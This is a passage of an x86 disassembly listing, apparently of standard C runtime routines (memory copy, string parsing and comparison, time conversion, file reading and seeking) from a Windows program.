loc_418480: ; CODE XREF: sub_4182C0+1B1�j
; sub_4182C0+208�j ...
neg ecx
jmp off_418550[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41848C: ; CODE XREF: sub_4182C0+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_4184A4
and eax, 3
sub ecx, eax
jmp dword ptr loc_4184A4+4[eax*4]
; ---------------------------------------------------------------------------
loc_4184A4: ; CODE XREF: sub_4182C0+1D6�j
; DATA XREF: sub_4182C0+1DD�r
jmp off_4185A0[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4184B7+1
; ---------------------------------------------------------------------------
fadd dword ptr [ecx+eax*2+41850000h]
loc_4184B7: ; DATA XREF: sub_4182C0+1EC�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_418480
std
rep movsd
cld
jmp off_4185A0[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_418480
std
rep movsd
cld
jmp off_4185A0[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_418480
std
rep movsd
cld
jmp off_4185A0[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_418554
dd offset loc_41855C
dd offset loc_418564
dd offset loc_41856C
dd offset loc_418574
dd offset loc_41857C
dd offset loc_418584
off_418550 dd offset loc_418597 ; DATA XREF: sub_4182C0+1C2�r
; ---------------------------------------------------------------------------
loc_418554: ; DATA XREF: sub_4182C0+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_41855C: ; DATA XREF: sub_4182C0+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_418564: ; DATA XREF: sub_4182C0+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_41856C: ; DATA XREF: sub_4182C0+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_418574: ; DATA XREF: sub_4182C0+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_41857C: ; DATA XREF: sub_4182C0+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_418584: ; DATA XREF: sub_4182C0+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_418597: ; CODE XREF: sub_4182C0+1C2�j
; DATA XREF: sub_4182C0:off_418550�o
jmp off_4185A0[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_4185A0 dd offset loc_4185B0 ; DATA XREF: sub_4182C0+1B7�r
; sub_4182C0:loc_4184A4�r ...
dd offset loc_4185B8
dd offset loc_4185C8
dd offset loc_4185DC
; ---------------------------------------------------------------------------
loc_4185B0: ; CODE XREF: sub_4182C0+1B7�j
; sub_4182C0:loc_4184A4�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4185B8: ; CODE XREF: sub_4182C0+1B7�j
; sub_4182C0:loc_4184A4�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4185C8: ; CODE XREF: sub_4182C0+1B7�j
; sub_4182C0:loc_4184A4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4185DC: ; CODE XREF: sub_4182C0+1B7�j
; sub_4182C0:loc_4184A4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_4182C0 endp
; =============== S U B R O U T I N E =======================================
sub_4185F5 proc near ; CODE XREF: sub_40473F+34�p
; sub_40473F+4F�p ...
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
call sub_417B9B
pop ecx
pop ecx
retn
sub_4185F5 endp
; =============== S U B R O U T I N E =======================================
sub_418603 proc near ; CODE XREF: sub_418670+4�p
arg_0 = dword ptr 4
push esi
push ds:dword_48B69C
call sub_41D5A8
mov edx, ds:dword_48B69C
pop ecx
mov ecx, ds:dword_48B698
mov esi, ecx
sub esi, edx
add esi, 4
cmp eax, esi
pop esi
jnb short loc_418662
push edx
call sub_41D5A8
add eax, 10h
push eax
push ds:dword_48B69C
call sub_41944F
add esp, 0Ch
test eax, eax
jnz short loc_418645
retn
; ---------------------------------------------------------------------------
loc_418645: ; CODE XREF: sub_418603+3F�j
mov ecx, ds:dword_48B698
sub ecx, ds:dword_48B69C
mov ds:dword_48B69C, eax
sar ecx, 2
lea ecx, [eax+ecx*4]
mov ds:dword_48B698, ecx
loc_418662: ; CODE XREF: sub_418603+23�j
mov eax, [esp+arg_0]
mov [ecx], eax
add ds:dword_48B698, 4
retn
sub_418603 endp
; =============== S U B R O U T I N E =======================================
sub_418670 proc near ; CODE XREF: sub_40482C+1A�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_418603
neg eax
sbb eax, eax
pop ecx
neg eax
dec eax
retn
sub_418670 endp
; =============== S U B R O U T I N E =======================================
sub_418682 proc near ; DATA XREF: _2:00426018�o
push 80h
call sub_417B89
test eax, eax
pop ecx
mov ds:dword_48B69C, eax
jnz short loc_4186A3
push 18h
call sub_419CDA
mov eax, ds:dword_48B69C
pop ecx
loc_4186A3: ; CODE XREF: sub_418682+12�j
and dword ptr [eax], 0
mov eax, ds:dword_48B69C
mov ds:dword_48B698, eax
retn
sub_418682 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4186B1 proc near ; CODE XREF: sub_40494F+1B0�p
; sub_4053D5+4E�p
var_CC = byte ptr -0CCh
var_32 = word ptr -32h
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0CCh
lea eax, [ebp+var_10]
push eax
call ds:dword_42406C ; GetLocalTime
lea eax, [ebp+var_20]
push eax
call ds:dword_424190 ; GetSystemTime
mov ax, [ebp+var_16]
cmp ax, ds:word_48A00A
jnz short loc_418716
mov ax, [ebp+var_18]
cmp ax, ds:word_48A008
jnz short loc_418716
mov ax, [ebp+var_1A]
cmp ax, ds:word_48A006
jnz short loc_418716
mov ax, [ebp+var_1E]
cmp ax, ds:word_48A002
jnz short loc_418716
mov ax, [ebp+var_20]
cmp ax, ds:word_48A000
jnz short loc_418716
mov eax, ds:dword_489FF8
jmp short loc_41875B
; ---------------------------------------------------------------------------
loc_418716: ; CODE XREF: sub_4186B1+28�j
; sub_4186B1+35�j ...
lea eax, [ebp+var_CC]
push eax
call ds:dword_42418C ; GetTimeZoneInformation
cmp eax, 0FFFFFFFFh
jz short loc_418743
cmp eax, 2
jnz short loc_41873F
cmp [ebp+var_32], 0
jz short loc_41873F
cmp [ebp+var_24], 0
jz short loc_41873F
push 1
pop eax
jmp short loc_418746
; ---------------------------------------------------------------------------
loc_41873F: ; CODE XREF: sub_4186B1+7A�j
; sub_4186B1+81�j ...
xor eax, eax
jmp short loc_418746
; ---------------------------------------------------------------------------
loc_418743: ; CODE XREF: sub_4186B1+75�j
or eax, 0FFFFFFFFh
loc_418746: ; CODE XREF: sub_4186B1+8C�j
; sub_4186B1+90�j
push esi
push edi
lea esi, [ebp+var_20]
mov edi, offset word_48A000
movsd
movsd
movsd
movsd
pop edi
mov ds:dword_489FF8, eax
pop esi
loc_41875B: ; CODE XREF: sub_4186B1+63�j
push eax
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_10]
push eax
call sub_41D609
mov ecx, [ebp+arg_0]
add esp, 1Ch
test ecx, ecx
jz short locret_41878B
mov [ecx], eax
locret_41878B: ; CODE XREF: sub_4186B1+D6�j
leave
retn
sub_4186B1 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418790 proc near ; CODE XREF: sub_40494F+18�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
lea eax, dword_48A0A0
cmp dword ptr [eax+8], 0
jnz short loc_4187E3
mov al, 0FFh
mov edi, edi
loc_4187AC: ; CODE XREF: sub_418790+28�j
; sub_418790+48�j
or al, al
jz short loc_4187DE
mov al, [esi]
inc esi
mov ah, [edi]
inc edi
cmp ah, al
jz short loc_4187AC
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
xchg ah, al
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
cmp al, ah
jz short loc_4187AC
sbb al, al
sbb al, 0FFh
loc_4187DE: ; CODE XREF: sub_418790+1E�j
movsx eax, al
jmp short loc_418817
; ---------------------------------------------------------------------------
loc_4187E3: ; CODE XREF: sub_418790+16�j
mov eax, 0FFh
xor ebx, ebx
mov edi, edi
loc_4187EC: ; CODE XREF: sub_418790+68�j
; sub_418790+80�j
or al, al
jz short loc_418817
mov al, [esi]
inc esi
mov bl, [edi]
inc edi
cmp al, bl
jz short loc_4187EC
push eax
push ebx
call sub_419101
mov ebx, eax
add esp, 4
call sub_419101
add esp, 4
cmp bl, al
jz short loc_4187EC
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_418817: ; CODE XREF: sub_418790+51�j
; sub_418790+5E�j
pop ebx
pop esi
pop edi
leave
retn
sub_418790 endp
; =============== S U B R O U T I N E =======================================
sub_41881C proc near ; CODE XREF: sub_41AB9C+11B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_418833
add esp, 10h
retn
sub_41881C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418833 proc near ; CODE XREF: sub_41881C+E�p
; sub_418A3B+E�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
and [ebp+var_8], 0
push esi
push edi
mov edi, [ebp+arg_0]
mov bl, [edi]
lea esi, [edi+1]
mov [ebp+var_4], esi
loc_41884B: ; CODE XREF: sub_418833+46�j
cmp ds:dword_4397AC, 1
jle short loc_418863
movzx eax, bl
push 8
push eax
call sub_41A642
pop ecx
pop ecx
jmp short loc_418872
; ---------------------------------------------------------------------------
loc_418863: ; CODE XREF: sub_418833+1F�j
mov ecx, ds:off_4395A0
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 8
loc_418872: ; CODE XREF: sub_418833+2E�j
test eax, eax
jz short loc_41887B
mov bl, [esi]
inc esi
jmp short loc_41884B
; ---------------------------------------------------------------------------
loc_41887B: ; CODE XREF: sub_418833+41�j
cmp bl, 2Dh
mov [ebp+var_4], esi
jnz short loc_418889
or [ebp+arg_C], 2
jmp short loc_41888E
; ---------------------------------------------------------------------------
loc_418889: ; CODE XREF: sub_418833+4E�j
cmp bl, 2Bh
jnz short loc_418894
loc_41888E: ; CODE XREF: sub_418833+54�j
mov bl, [esi]
inc esi
mov [ebp+var_4], esi
loc_418894: ; CODE XREF: sub_418833+59�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_418A2B
cmp eax, 1
jz loc_418A2B
cmp eax, 24h
jg loc_418A2B
push 10h
test eax, eax
pop ecx
jnz short loc_4188DC
cmp bl, 30h
jz short loc_4188C6
mov [ebp+arg_8], 0Ah
jmp short loc_4188F8
; ---------------------------------------------------------------------------
loc_4188C6: ; CODE XREF: sub_418833+88�j
mov al, [esi]
cmp al, 78h
jz short loc_4188D9
cmp al, 58h
jz short loc_4188D9
mov [ebp+arg_8], 8
jmp short loc_4188F8
; ---------------------------------------------------------------------------
loc_4188D9: ; CODE XREF: sub_418833+97�j
; sub_418833+9B�j
mov [ebp+arg_8], ecx
loc_4188DC: ; CODE XREF: sub_418833+83�j
cmp [ebp+arg_8], ecx
jnz short loc_4188F8
cmp bl, 30h
jnz short loc_4188F8
mov al, [esi]
cmp al, 78h
jz short loc_4188F0
cmp al, 58h
jnz short loc_4188F8
loc_4188F0: ; CODE XREF: sub_418833+B7�j
mov bl, [esi+1]
inc esi
inc esi
mov [ebp+var_4], esi
loc_4188F8: ; CODE XREF: sub_418833+91�j
; sub_418833+A4�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
mov edi, 103h
mov [ebp+var_C], eax
loc_418908: ; CODE XREF: sub_418833+16C�j
cmp ds:dword_4397AC, 1
movzx esi, bl
jle short loc_418920
push 4
push esi
call sub_41A642
pop ecx
pop ecx
jmp short loc_41892B
; ---------------------------------------------------------------------------
loc_418920: ; CODE XREF: sub_418833+DF�j
mov eax, ds:off_4395A0
mov al, [eax+esi*2]
and eax, 4
loc_41892B: ; CODE XREF: sub_418833+EB�j
test eax, eax
jz short loc_418937
movsx ecx, bl
sub ecx, 30h
jmp short loc_418969
; ---------------------------------------------------------------------------
loc_418937: ; CODE XREF: sub_418833+FA�j
cmp ds:dword_4397AC, 1
jle short loc_41894B
push edi
push esi
call sub_41A642
pop ecx
pop ecx
jmp short loc_418956
; ---------------------------------------------------------------------------
loc_41894B: ; CODE XREF: sub_418833+10B�j
mov eax, ds:off_4395A0
mov ax, [eax+esi*2]
and eax, edi
loc_418956: ; CODE XREF: sub_418833+116�j
test eax, eax
jz short loc_4189A4
movsx eax, bl
push eax
call sub_41D6CB
pop ecx
mov ecx, eax
sub ecx, 37h
loc_418969: ; CODE XREF: sub_418833+102�j
cmp ecx, [ebp+arg_8]
jnb short loc_4189A4
mov esi, [ebp+var_8]
or [ebp+arg_C], 8
cmp esi, [ebp+var_C]
jb short loc_41898E
jnz short loc_418988
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
cmp ecx, edx
jbe short loc_41898E
loc_418988: ; CODE XREF: sub_418833+147�j
or [ebp+arg_C], 4
jmp short loc_418997
; ---------------------------------------------------------------------------
loc_41898E: ; CODE XREF: sub_418833+145�j
; sub_418833+153�j
imul esi, [ebp+arg_8]
add esi, ecx
mov [ebp+var_8], esi
loc_418997: ; CODE XREF: sub_418833+159�j
mov eax, [ebp+var_4]
inc [ebp+var_4]
mov bl, [eax]
jmp loc_418908
; ---------------------------------------------------------------------------
loc_4189A4: ; CODE XREF: sub_418833+125�j
; sub_418833+139�j
mov ecx, [ebp+arg_C]
dec [ebp+var_4]
mov edx, [ebp+arg_4]
test cl, 8
jnz short loc_4189C2
test edx, edx
jz short loc_4189BC
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_4189BC: ; CODE XREF: sub_418833+181�j
and [ebp+var_8], 0
jmp short loc_418A0F
; ---------------------------------------------------------------------------
loc_4189C2: ; CODE XREF: sub_418833+17D�j
test cl, 4
mov eax, 7FFFFFFFh
jnz short loc_4189E8
test cl, 1
jnz short loc_418A0F
and ecx, 2
jz short loc_4189DF
cmp [ebp+var_8], 80000000h
ja short loc_4189E8
loc_4189DF: ; CODE XREF: sub_418833+1A1�j
test ecx, ecx
jnz short loc_418A0F
cmp [ebp+var_8], eax
jbe short loc_418A0F
loc_4189E8: ; CODE XREF: sub_418833+197�j
; sub_418833+1AA�j
test byte ptr [ebp+arg_C], 1
mov ds:dword_48A014, 22h
jz short loc_4189FE
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_418A0F
; ---------------------------------------------------------------------------
loc_4189FE: ; CODE XREF: sub_418833+1C3�j
mov ecx, [ebp+arg_C]
and cl, 2
neg cl
sbb ecx, ecx
neg ecx
add ecx, eax
mov [ebp+var_8], ecx
loc_418A0F: ; CODE XREF: sub_418833+18D�j
; sub_418833+19C�j ...
test edx, edx
jz short loc_418A18
mov eax, [ebp+var_4]
mov [edx], eax
loc_418A18: ; CODE XREF: sub_418833+1DE�j
test byte ptr [ebp+arg_C], 2
jz short loc_418A26
mov eax, [ebp+var_8]
neg eax
mov [ebp+var_8], eax
loc_418A26: ; CODE XREF: sub_418833+1E9�j
mov eax, [ebp+var_8]
jmp short loc_418A36
; ---------------------------------------------------------------------------
loc_418A2B: ; CODE XREF: sub_418833+66�j
; sub_418833+6F�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_418A34
mov [eax], edi
loc_418A34: ; CODE XREF: sub_418833+1FD�j
xor eax, eax
loc_418A36: ; CODE XREF: sub_418833+1F6�j
pop edi
pop esi
pop ebx
leave
retn
sub_418833 endp
; =============== S U B R O U T I N E =======================================
sub_418A3B proc near ; CODE XREF: sub_4053D5+4BD�p
; sub_40EE72+3773�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_418833
add esp, 10h
retn
sub_418A3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418A52 proc near ; CODE XREF: sub_4053D5+266�p
; sub_4053D5+46A�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
mov [ebp+var_14], 49h
push eax
mov [ebp+var_18], eax
mov [ebp+var_20], eax
call sub_417AB0
mov [ebp+var_1C], eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
push eax
call sub_41D797
add esp, 10h
leave
retn
sub_418A52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418A86 proc near ; CODE XREF: sub_405A58+4E�p
; sub_406C19+30E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov ecx, edi
test edi, edi
mov [ebp+var_4], edi
mov [ebp+arg_0], ecx
jnz short loc_418AAA
xor eax, eax
jmp loc_418B53
; ---------------------------------------------------------------------------
loc_418AAA: ; CODE XREF: sub_418A86+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_418ABD
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_418AC9
; ---------------------------------------------------------------------------
loc_418ABD: ; CODE XREF: sub_418A86+2D�j
mov [ebp+arg_C], 1000h
jmp short loc_418AC9
; ---------------------------------------------------------------------------
loc_418AC6: ; CODE XREF: sub_418A86+C4�j
mov ecx, [ebp+arg_0]
loc_418AC9: ; CODE XREF: sub_418A86+35�j
; sub_418A86+3E�j
test word ptr [esi+0Ch], 10Ch
jz short loc_418AFB
mov eax, [esi+4]
test eax, eax
jz short loc_418AFB
cmp ecx, eax
mov edi, ecx
jb short loc_418AE0
mov edi, eax
loc_418AE0: ; CODE XREF: sub_418A86+56�j
push edi
push dword ptr [esi]
push ebx
call sub_417390
sub [ebp+arg_0], edi
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
add ebx, edi
mov edi, [ebp+var_4]
jmp short loc_418B46
; ---------------------------------------------------------------------------
loc_418AFB: ; CODE XREF: sub_418A86+49�j
; sub_418A86+50�j
cmp ecx, [ebp+arg_C]
jb short loc_418B2E
cmp [ebp+arg_C], 0
mov eax, ecx
jz short loc_418B11
xor edx, edx
div [ebp+arg_C]
mov eax, ecx
sub eax, edx
loc_418B11: ; CODE XREF: sub_418A86+80�j
push eax
push ebx
push dword ptr [esi+10h]
call sub_41E321
add esp, 0Ch
test eax, eax
jz short loc_418B58
cmp eax, 0FFFFFFFFh
jz short loc_418B5E
sub [ebp+arg_0], eax
add ebx, eax
jmp short loc_418B46
; ---------------------------------------------------------------------------
loc_418B2E: ; CODE XREF: sub_418A86+78�j
push esi
call sub_41E248
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_418B62
mov [ebx], al
mov eax, [esi+18h]
inc ebx
dec [ebp+arg_0]
mov [ebp+arg_C], eax
loc_418B46: ; CODE XREF: sub_418A86+73�j
; sub_418A86+A6�j
cmp [ebp+arg_0], 0
jnz loc_418AC6
mov eax, [ebp+arg_8]
loc_418B53: ; CODE XREF: sub_418A86+1F�j
; sub_418A86+E6�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_418B58: ; CODE XREF: sub_418A86+9A�j
or dword ptr [esi+0Ch], 10h
jmp short loc_418B62
; ---------------------------------------------------------------------------
loc_418B5E: ; CODE XREF: sub_418A86+9F�j
or dword ptr [esi+0Ch], 20h
loc_418B62: ; CODE XREF: sub_418A86+B2�j
; sub_418A86+D6�j
mov eax, edi
xor edx, edx
sub eax, [ebp+arg_0]
div [ebp+arg_4]
jmp short loc_418B53
sub_418A86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418B6E proc near ; CODE XREF: sub_405AF2+2B2�p
; sub_4060D0+101�p ...
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_418B87: ; CODE XREF: sub_418B6E+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_418B87
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_418BAF
mov edx, ds:dword_48A010
loc_418BAF: ; CODE XREF: sub_418B6E+39�j
; sub_418B6E+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_418BCF
test al, al
jz short loc_418BCF
inc edx
jmp short loc_418BAF
; ---------------------------------------------------------------------------
loc_418BCF: ; CODE XREF: sub_418B6E+58�j
; sub_418B6E+5C�j
mov ebx, edx
loc_418BD1: ; CODE XREF: sub_418B6E+81�j
mov al, [edx]
test al, al
jz short loc_418BF5
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_418BF1
inc edx
jmp short loc_418BD1
; ---------------------------------------------------------------------------
loc_418BF1: ; CODE XREF: sub_418B6E+7E�j
and byte ptr [edx], 0
inc edx
loc_418BF5: ; CODE XREF: sub_418B6E+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov ds:dword_48A010, edx
and eax, ebx
pop ebx
leave
retn
sub_418B6E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418C10 proc near ; CODE XREF: sub_406387+1B6�p
; sub_407252+6E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_418C93
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_418C34
shr ecx, 2
jnz short loc_418CA1
jmp short loc_418C55
; ---------------------------------------------------------------------------
loc_418C34: ; CODE XREF: sub_418C10+1B�j
; sub_418C10+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_418C62
test al, al
jz short loc_418C6A
test esi, 3
jnz short loc_418C34
mov ebx, ecx
shr ecx, 2
jnz short loc_418CA1
loc_418C50: ; CODE XREF: sub_418C10+8F�j
and ebx, 3
jz short loc_418C62
loc_418C55: ; CODE XREF: sub_418C10+22�j
; sub_418C10+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_418C8E
dec ebx
jnz short loc_418C55
loc_418C62: ; CODE XREF: sub_418C10+2B�j
; sub_418C10+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_418C6A: ; CODE XREF: sub_418C10+2F�j
test edi, 3
jz short loc_418C84
loc_418C72: ; CODE XREF: sub_418C10+72�j
mov [edi], al
inc edi
dec ecx
jz loc_418D06
test edi, 3
jnz short loc_418C72
loc_418C84: ; CODE XREF: sub_418C10+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_418CF7
loc_418C8B: ; CODE XREF: sub_418C10+7F�j
; sub_418C10+F4�j
mov [edi], al
inc edi
loc_418C8E: ; CODE XREF: sub_418C10+4D�j
dec ebx
jnz short loc_418C8B
pop ebx
pop esi
loc_418C93: ; CODE XREF: sub_418C10+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_418C99: ; CODE XREF: sub_418C10+A9�j
; sub_418C10+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_418C50
loc_418CA1: ; CODE XREF: sub_418C10+20�j
; sub_418C10+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_418C99
test dl, dl
jz short loc_418CEB
test dh, dh
jz short loc_418CE1
test edx, 0FF0000h
jz short loc_418CD7
test edx, 0FF000000h
jnz short loc_418C99
mov [edi], edx
jmp short loc_418CEF
; ---------------------------------------------------------------------------
loc_418CD7: ; CODE XREF: sub_418C10+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_418CEF
; ---------------------------------------------------------------------------
loc_418CE1: ; CODE XREF: sub_418C10+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_418CEF
; ---------------------------------------------------------------------------
loc_418CEB: ; CODE XREF: sub_418C10+AD�j
xor edx, edx
mov [edi], edx
loc_418CEF: ; CODE XREF: sub_418C10+C5�j
; sub_418C10+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_418D01
loc_418CF7: ; CODE XREF: sub_418C10+79�j
xor eax, eax
loc_418CF9: ; CODE XREF: sub_418C10+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_418CF9
loc_418D01: ; CODE XREF: sub_418C10+E5�j
and ebx, 3
jnz short loc_418C8B
loc_418D06: ; CODE XREF: sub_418C10+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_418C10 endp
; =============== S U B R O U T I N E =======================================
sub_418D0E proc near ; CODE XREF: sub_406C19+2E2�p
; sub_406C19+435�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push edi
mov eax, [esi+0Ch]
test al, 83h
jz short loc_418D8A
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_418D2D
cmp edi, 1
jz short loc_418D2D
cmp edi, 2
jnz short loc_418D8A
loc_418D2D: ; CODE XREF: sub_418D0E+13�j
; sub_418D0E+18�j
and al, 0EFh
cmp edi, 1
mov [esi+0Ch], eax
jnz short loc_418D44
push esi
call sub_41E5B1
add [esp+0Ch+arg_4], eax
pop ecx
xor edi, edi
loc_418D44: ; CODE XREF: sub_418D0E+27�j
push esi
call sub_41A7D0
mov eax, [esi+0Ch]
pop ecx
test al, 80h
jz short loc_418D59
and al, 0FCh
mov [esi+0Ch], eax
jmp short loc_418D6D
; ---------------------------------------------------------------------------
loc_418D59: ; CODE XREF: sub_418D0E+42�j
test al, 1
jz short loc_418D6D
test al, 8
jz short loc_418D6D
test ah, 4
jnz short loc_418D6D
mov dword ptr [esi+18h], 200h
loc_418D6D: ; CODE XREF: sub_418D0E+49�j
; sub_418D0E+4D�j ...
push edi
push [esp+0Ch+arg_4]
push dword ptr [esi+10h]
call sub_41E517
add esp, 0Ch
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
dec ecx
mov eax, ecx
jmp short loc_418D97
; ---------------------------------------------------------------------------
loc_418D8A: ; CODE XREF: sub_418D0E+B�j
; sub_418D0E+1D�j
mov ds:dword_48A014, 16h
or eax, 0FFFFFFFFh
loc_418D97: ; CODE XREF: sub_418D0E+7A�j
pop edi
pop esi
retn
sub_418D0E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418DA0 proc near ; CODE XREF: sub_406C19+2AC�p
